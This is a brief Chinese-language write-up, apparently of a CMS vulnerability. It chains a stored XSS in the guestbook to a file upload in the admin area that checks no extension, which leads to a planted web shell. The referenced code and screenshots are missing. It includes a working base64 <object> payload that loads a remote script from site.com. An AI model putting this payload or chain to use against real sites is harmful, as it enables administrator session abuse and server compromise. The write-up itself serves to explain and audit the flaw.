直接进入网站留言:

然后去后台查看留言:

这里我们更换一下payload:
<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3NpdGUuY29tL3NoZWxsLmpzPjwvc2NyaXB0Pg==">
加载一个远程的js,http://site.com/shell.js js里面可以这样写:
这段代码就是在后台有一个添加产品的地方,我们直接看代码:
product-add.php(27-45):
发现问题了没有,这里的filename=date("ymdhis")
我们跟进去$upload->set_file_name($filename);
在看看:
upload.class.php(55-59):
这里没有做任何限制,什么后缀 就什么保留
当管理员审核我们留言的时候,我们提交之后发现在这个目录下有个shell文件:

。。。。。。。。